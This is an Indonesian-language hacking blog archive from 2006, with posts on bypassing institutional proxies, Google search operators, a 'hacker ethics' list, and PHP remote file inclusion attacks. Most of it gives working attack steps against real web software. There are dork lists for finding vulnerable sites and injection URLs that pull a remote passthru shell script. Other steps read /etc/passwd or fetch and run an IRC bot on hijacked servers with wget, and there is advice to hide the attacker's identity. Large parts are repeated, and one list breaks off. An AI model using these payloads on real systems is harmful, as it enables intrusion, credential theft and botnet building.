Nah sekali lagi semuanya itu ditetapkan berdasarkan suatu rules, yang dalam hal ini adalah ketentuan penggunaan lalu lintas dan port. Nah yang paling sederhana untuk membatasi pembatasan ini adalah dengan menggunakan anonymous server atau proxy server lain di luar Proxy atau gateway instansi kita.Mangapa hal ini memungkinkan?Karena yang dicatat adalah bahwa kita membuka hanya ke alamat URL dari anonymous browsing atau proxy tersebut sehingga URL mana yang kita tuju dari proxy atau anonymous browsing itu tidak akan terlihat pada proxy atau firewall kita.
Nah untuk contohnya coba ajah : www.guardster.com, www.freebrowsing.com, dll
Nah untuk list proxynya liat ajah di : http://familycode.atspace.com/irc.htm atau di http://www.samair.ru/proxy/socks.htm
2. Cara kedua;
Nah pada cara kedua ini adalah dengan melakukan 'tunneling' terhadap proxy server kita. Nah untuk yang satu ini diperlukan sedikit pengetahuan dan informasi.Nah sebelumnya saya sudah bilang bahwa semuanya hanyalah pengaturan lalu lintas dari data dan port apa yang digunakan.Nah cari taulah port berapa saja yang digunakan dan untuk apa. Nah lakukanlah tehnik scanning. Nah setelah kita tahu maka gunakanlah berbagai software yang tersedia di Internet untuk melakukan tunneling proxy. Jangan males yah banyak kok. Tanya ajah om GOOGLE keyword "proxy tunneling".
sebagai contohnya : InvisibleBrowsing, bypass Client, Proxyway, dll
Nah setting dech proxy yang digunakan, dan jika diperlukkan lakukan setting port yang digunakan.
Nah itulah cara ngakali Proxy pada kantor atau kampus kamu. Nah sebenarnya masih ada satu cara lagi dan cukup mudah. Ini adalah kelebihan dari Paman kita yang terkenal baik hati dan menyediakan pada kita segalanya.Ya itulah 'Om Google' kita.GOOGLE...bukan untuk searching tapi untuk jadi anonymous.Kok bisa?Nah kita gunakan salah satu fasilitasnya yaitu translate.
Coba Dech : http://translate.google.com/translate?u=
Nah sebenarnya ini adalah fasilitas GOOGLE untuk mentranslate isi website, tetapi jika tidak ada akan ditampilkan aslinya.Namun cara ini cukup kuno dan kalo admin nya pinter hal ini dapat di cegah.
Nah demikian dulu Saya berbagi informasinya.
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Keampuhan Om Google
Setelah sekian lama tidak membuat posting baru akhirnya hari ini aku dapat melakukannya lagi. Beberapa hari lalu daku keluar kota sehingga boro2 posting, konek internet juga ndak. Nah pada kesempatan kali ini Daku ingin memberikan informasi sedikit mengenai salah satu search engine paling powerful di dunia. Mungkin sudah tidak asing lagi bagi anda menggunakannya."GOOGLE" yah itulah search engine kita. Yang memudahkan kita semua dalam mendapatkan informasi tentang apa saja di seluruh dunia dalam waktu yang singkat.Atau yang dalam panggilan akrabnya kita sering menyebut 'Om Google'.
Pada kesempatan ini saya akan memberikan sedikit tips saja untuk anda dalam menggunakan semua fasilitas google ini.
Nah langsung dech kita mulai. Untuk mengetahui fasilitas apa saja yang terdapat dalam google maka kita bisa melihat pada link :
-= http://www.google.com/intl/en/options/ =-
Itulah semua layanan yang disediakan oleh google. Nah pada posting pertama ini saya hanya akan memberikan sedikit tips dalam penggunaan Google.
1. Pertama, lakukanlah pencarian dengan detail. Dalam hal ini masukkan keyword selengkapnya sehingga pencarian dapat lebih terarah.Berikut ini saya lampirkan beberapa Google Syntax:
-. [intitle:]
Memungkinkan kita melakukan search berdasarkan title atau judul dari halam web.Google akan membatasi hasil pencarian sesuai dengan permintaan kita. Misal : "intitle:login", maka google akan menampilkan semua halaman web dengan judul atau title "login". Perlu diingat bahwa command2 tersebut hanya akan mengenali satu kata sesudahnya. Kalau kita menggunakan "intitle:login password", maka google akan menampilkan halam dengan judul atau title login dan terdapat kata password di halaman web tersebut.
Bila kita menginginkan pencarian dengan title atau judul "login password" maka kita mengetikkan "allintitle:login password".
-. [inurl:]
Memungkinkan kita melakukan pencarian pada suatu situs tertentu saja. Misal : "password inurl:www.jasakom.com", maka pencarian dengan keyword password akan dilakukan pada situs www.jasakom.com.
-. [site:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian pada site atau domain tertentu. Misal : "hacking site:co.id" akan dilakukan pencarian dengan keyword hacking pada semua site dengan domain .co.id.
-. [filetype:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian terhadapa file dengan ekstensi tertentu saja. Misal : "filetype:doc site:gov", maka akan ditampilkan semua link berisikan file dengan ekstensi .doc di domain gov.
-. [link:]
Memungkinkan pencarian untuk menampilkan halaman-halaman web yang mempunyai link ke suatu situs tertentu. Misal : "link:www.123.net", maka akan ditampilkan semua halaman situs yang mempunyai link ke www.123.net.
-. [related:]
Memungkinkan pencarian untuk menampilkan hasil-hasil yang mirip dengan web yang di spesifikasikan. Misal : "www.blackhat.com" akan menampilkan list halaman-halaman yang mirip blackhat.com.
-. [intext:]
Menampilkan hasil pencarian terhadap kata-kata tertentu, dengan mengabaikan URL serta judul dari halaman web.Misal : "intext:expoits" akan menampilkan halaman web yang ada kata-kata expoits.
-. [phonebook:]
Membantu pencarian untuk orang atau alamat.Misal : "phonebook:Anto+Bandung", maka akan ditampilkan informasi mengenai seseorang berupa alamat pada lokasi yang dicari.
Nah demikian dulu sedikit sharingnya mengenai Search Engine 'GOOGLE'.
Sumber : Buku 'Hack Attack, Konsep, Penerapan dan Pencegahan'
Pada kesempatan ini saya akan memberikan sedikit tips saja untuk anda dalam menggunakan semua fasilitas google ini.
Nah langsung dech kita mulai. Untuk mengetahui fasilitas apa saja yang terdapat dalam google maka kita bisa melihat pada link :
-= http://www.google.com/intl/en/options/ =-
Itulah semua layanan yang disediakan oleh google. Nah pada posting pertama ini saya hanya akan memberikan sedikit tips dalam penggunaan Google.
1. Pertama, lakukanlah pencarian dengan detail. Dalam hal ini masukkan keyword selengkapnya sehingga pencarian dapat lebih terarah.Berikut ini saya lampirkan beberapa Google Syntax:
-. [intitle:]
Memungkinkan kita melakukan search berdasarkan title atau judul dari halam web.Google akan membatasi hasil pencarian sesuai dengan permintaan kita. Misal : "intitle:login", maka google akan menampilkan semua halaman web dengan judul atau title "login". Perlu diingat bahwa command2 tersebut hanya akan mengenali satu kata sesudahnya. Kalau kita menggunakan "intitle:login password", maka google akan menampilkan halam dengan judul atau title login dan terdapat kata password di halaman web tersebut.
Bila kita menginginkan pencarian dengan title atau judul "login password" maka kita mengetikkan "allintitle:login password".
-. [inurl:]
Memungkinkan kita melakukan pencarian pada suatu situs tertentu saja. Misal : "password inurl:www.jasakom.com", maka pencarian dengan keyword password akan dilakukan pada situs www.jasakom.com.
-. [site:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian pada site atau domain tertentu. Misal : "hacking site:co.id" akan dilakukan pencarian dengan keyword hacking pada semua site dengan domain .co.id.
-. [filetype:]
Memungkinkan kita melakukan pencarian untuk membatasi pencarian terhadapa file dengan ekstensi tertentu saja. Misal : "filetype:doc site:gov", maka akan ditampilkan semua link berisikan file dengan ekstensi .doc di domain gov.
-. [link:]
Memungkinkan pencarian untuk menampilkan halaman-halaman web yang mempunyai link ke suatu situs tertentu. Misal : "link:www.123.net", maka akan ditampilkan semua halaman situs yang mempunyai link ke www.123.net.
-. [related:]
Memungkinkan pencarian untuk menampilkan hasil-hasil yang mirip dengan web yang di spesifikasikan. Misal : "www.blackhat.com" akan menampilkan list halaman-halaman yang mirip blackhat.com.
-. [intext:]
Menampilkan hasil pencarian terhadap kata-kata tertentu, dengan mengabaikan URL serta judul dari halaman web.Misal : "intext:expoits" akan menampilkan halaman web yang ada kata-kata expoits.
-. [phonebook:]
Membantu pencarian untuk orang atau alamat.Misal : "phonebook:Anto+Bandung", maka akan ditampilkan informasi mengenai seseorang berupa alamat pada lokasi yang dicari.
Nah demikian dulu sedikit sharingnya mengenai Search Engine 'GOOGLE'.
Sumber : Buku 'Hack Attack, Konsep, Penerapan dan Pencegahan'
Tuesday, February 14, 2006
Hacking Ethical
HACKING ETHICALS ARE :
Above all else, do no harm.
Do not damage computers or data if at all possible. Much like the key element of the Hippocratic Oath.
Hacking is a quest for knowledge; there is no intrinsic need or desire to destroy. But it is generally held that system-cracking for fun and exploration is ethically OK as long as the cracker commits no theft, vandalism, or breach of confidentiality. However, accidents and pranks that hackers view as harmless may cause the victims to lose time and effort.
Protect privacy.
This is typically reconciled with the free information ethos by separating public information from private. How the line is drawn is, of course, a question of personal (and political) views.
Waste not, want not.
Computer resources should not lie idle and wasted. Using idle time and perhaps leaving suggestions for improved performance is seen as a favor.
Exceed limitations.
"Telling a hacker something can´t be done, is a moral imperative for him to try."
The communicational imperative.
Communicating with and associating with peers is a fundamental human right. Some see it as strong enough to motivate violation of laws and regulations.
Leave no traces.
Keeping quiet about your exploits is not only for your protection. It also helps other hackers avoid getting caught or losing access.
Share!
Information increases in value by sharing it with other people. Data can be the basis for someone else´s learning; software can be improved collectively.
Fight cyber-tyranny.
Hacking is necessary to help protect the world from dystopian development of global information systems a la 1984.
Trust, but test.
By engaging hands-on with technical and social systems, your discoveries can contribute to improving the systems.
Above all else, do no harm.
Do not damage computers or data if at all possible. Much like the key element of the Hippocratic Oath.
Hacking is a quest for knowledge; there is no intrinsic need or desire to destroy. But it is generally held that system-cracking for fun and exploration is ethically OK as long as the cracker commits no theft, vandalism, or breach of confidentiality. However, accidents and pranks that hackers view as harmless may cause the victims to lose time and effort.
Protect privacy.
This is typically reconciled with the free information ethos by separating public information from private. How the line is drawn is, of course, a question of personal (and political) views.
Waste not, want not.
Computer resources should not lie idle and wasted. Using idle time and perhaps leaving suggestions for improved performance is seen as a favor.
Exceed limitations.
"Telling a hacker something can´t be done, is a moral imperative for him to try."
The communicational imperative.
Communicating with and associating with peers is a fundamental human right. Some see it as strong enough to motivate violation of laws and regulations.
Leave no traces.
Keeping quiet about your exploits is not only for your protection. It also helps other hackers avoid getting caught or losing access.
Share!
Information increases in value by sharing it with other people. Data can be the basis for someone else´s learning; software can be improved collectively.
Fight cyber-tyranny.
Hacking is necessary to help protect the world from dystopian development of global information systems a la 1984.
Trust, but test.
By engaging hands-on with technical and social systems, your discoveries can contribute to improving the systems.
Monday, February 13, 2006
Lirik MySQL lewat PhpInjection
Pada kesempatan lalu kita sudah bisa mencari target dan mendapatkannya. Abis itu dari pada di deface kita sudah menanam psybnc ato bot di dalamnya. Pada kesempatan kali ini saya akan memberikan sedikit tutor gimana yach klo jalan-jalan di dalam server itu sejenak.Enaknya khan kita bisa tau databasenya.Baiklah kita mulai tutor kita kali ini.
1. Inget aturan nomor satu sebelum memulai semuanya. Jangan lupa kompi udah terhubung dulu ke internet.
2. Nah duduk di depan kompi ... hmmm apa yang kurang yach ....Oh iya jangan lupa ROkok dan Kopi.
3. Setelah semua siap. Nah kita mulai dech.
4. Liat artikel PhpInjection, disitu kita sudah dapet target.Contoh:
-= http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd =-
Nah kmu ganti dech di address barnya jadi :
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/antri?&cmd
Nah Nongol dech tuh isi database nya. Hmm udah dapet listnya enaknya kita ngapain lagi yach.hehehhe ....
Klo ndak jalan berarti database nya bukan SQL atau mungkin Server database nya pisah sama webserver nya.
Nah cobain lagi dech cari target lain
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
1. Inget aturan nomor satu sebelum memulai semuanya. Jangan lupa kompi udah terhubung dulu ke internet.
2. Nah duduk di depan kompi ... hmmm apa yang kurang yach ....Oh iya jangan lupa ROkok dan Kopi.
3. Setelah semua siap. Nah kita mulai dech.
4. Liat artikel PhpInjection, disitu kita sudah dapet target.Contoh:
-= http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd =-
Nah kmu ganti dech di address barnya jadi :
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/antri?&cmd
Nah Nongol dech tuh isi database nya. Hmm udah dapet listnya enaknya kita ngapain lagi yach.hehehhe ....
Klo ndak jalan berarti database nya bukan SQL atau mungkin Server database nya pisah sama webserver nya.
Nah cobain lagi dech cari target lain
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Sunday, February 12, 2006
Membuat Eggdrop lewat PhpInjection
Pada artikel saya yang terakhir saya menulis tentang bagaimana melakukan Injection lewat script php.Pada kesempatan ini kita akan membuat Eggdrop pada PhpInjection yang kita buat.
Nah mending kita langsung ajah. Nah kamu tinggal masukkin dech di address bar:
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd
1. Kamu cari folder mana yang bisa kamu masuki dengan cara find /-perm 777 -type d
Atau kalo nggak mau repot langsung aja kamu wget di /var/tmp atau /tmp
2. Nah wget dech bot nya di :
ketik : wget http://www.geocities.com/k4k3_rgb/bot/linux.tgz
3. nah setelah itu kamu ekstrak :
ketik : tar -zxvf linux.tgz
misal : [januar@server tmp]$ tar -zxvf linux.tgz
4. Abis itu masuk dech ke directory .linux. Nah setelah berada pada directory .linux kamu ketik :
[januar@server .linux]$ ./nadya
maka akan keluar command seperti berikut :
Cara Penggunaan :
./nadya pr1 pr2 pr3 pr4 pr5 pr6
pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner
[januar@server .linux]$
Nah bikin dech bot sesuai keinginan kmu.
Contoh : ./nadya botk4k3 botk4k3 CrewK4k3 (ip tuh server) hackcrew k4k3
[januar@server .linux]$ ./nadya botk4k3 botk4k3 hackcrew 192.168.21.21 hackcrew k4k3
5. Nah setelah keluar perintah berikut :
Config file : botk4k3
set nick "botk4k3"
set username "hackcrew"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set basechan "#hackcrew"
set owner "k4k3"
cat: kinana.conf: No such file or directory
ketik: ./eggdrop -m botk4k3 untuk menjalankan bot anda
Thanks to k4k3 for his idea, You Are My Teacher !!!
maka ketikanlah :
./eggdrop -m botk4k3
contoh : [januar@server .linux]$ ./eggdrop -m botk4k3
6. Nah selesai dech bikin botnya.Kamu tinggal tunggu dech di channel kmu. Trus sapa dech botnya.
ketik: /msg botk4k3 hello
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Sumber : http://semparuk.mynew.ws/news.php
Nah mending kita langsung ajah. Nah kamu tinggal masukkin dech di address bar:
http://www.target.com/index.php?page=http://www.geocities.com/k4k3_rgb/test?&cmd
1. Kamu cari folder mana yang bisa kamu masuki dengan cara find /-perm 777 -type d
Atau kalo nggak mau repot langsung aja kamu wget di /var/tmp atau /tmp
2. Nah wget dech bot nya di :
ketik : wget http://www.geocities.com/k4k3_rgb/bot/linux.tgz
3. nah setelah itu kamu ekstrak :
ketik : tar -zxvf linux.tgz
misal : [januar@server tmp]$ tar -zxvf linux.tgz
4. Abis itu masuk dech ke directory .linux. Nah setelah berada pada directory .linux kamu ketik :
[januar@server .linux]$ ./nadya
maka akan keluar command seperti berikut :
Cara Penggunaan :
./nadya pr1 pr2 pr3 pr4 pr5 pr6
pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner
[januar@server .linux]$
Nah bikin dech bot sesuai keinginan kmu.
Contoh : ./nadya botk4k3 botk4k3 CrewK4k3 (ip tuh server) hackcrew k4k3
[januar@server .linux]$ ./nadya botk4k3 botk4k3 hackcrew 192.168.21.21 hackcrew k4k3
5. Nah setelah keluar perintah berikut :
Config file : botk4k3
set nick "botk4k3"
set username "hackcrew"
set my-hostname "192.168.21.21"
set my-ip "192.168.21.21"
set basechan "#hackcrew"
set owner "k4k3"
cat: kinana.conf: No such file or directory
ketik: ./eggdrop -m botk4k3 untuk menjalankan bot anda
Thanks to k4k3 for his idea, You Are My Teacher !!!
maka ketikanlah :
./eggdrop -m botk4k3
contoh : [januar@server .linux]$ ./eggdrop -m botk4k3
6. Nah selesai dech bikin botnya.Kamu tinggal tunggu dech di channel kmu. Trus sapa dech botnya.
ketik: /msg botk4k3 hello
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Sumber : http://semparuk.mynew.ws/news.php
Php Injection (updated every day)
Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.
1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums
Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/k4k3_rgb/list.txt =-
4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :
1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?
http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?
==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.
6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.
Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:
passthru($test);
?>
simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.
Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:
http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal
jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]
8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??
http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd
Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe
Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.
Thanks to,
#hackcrew, #binushacker, #kampunghacker, #batamhacker, #yogyafree dan semua pihak yang tidak bisa di sebut kan satu persatu.
Sumber :
Pengalaman Pribadi penulis
-= http://www.jasakom.com/article.aspx?ID=517 =-
-= http://www.clemens-fatek.com =-
-= http://www.yogyafree.net =-
-= http://www.hitam-putih.com =-
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.
1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums
Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/k4k3_rgb/list.txt =-
4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :
1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=
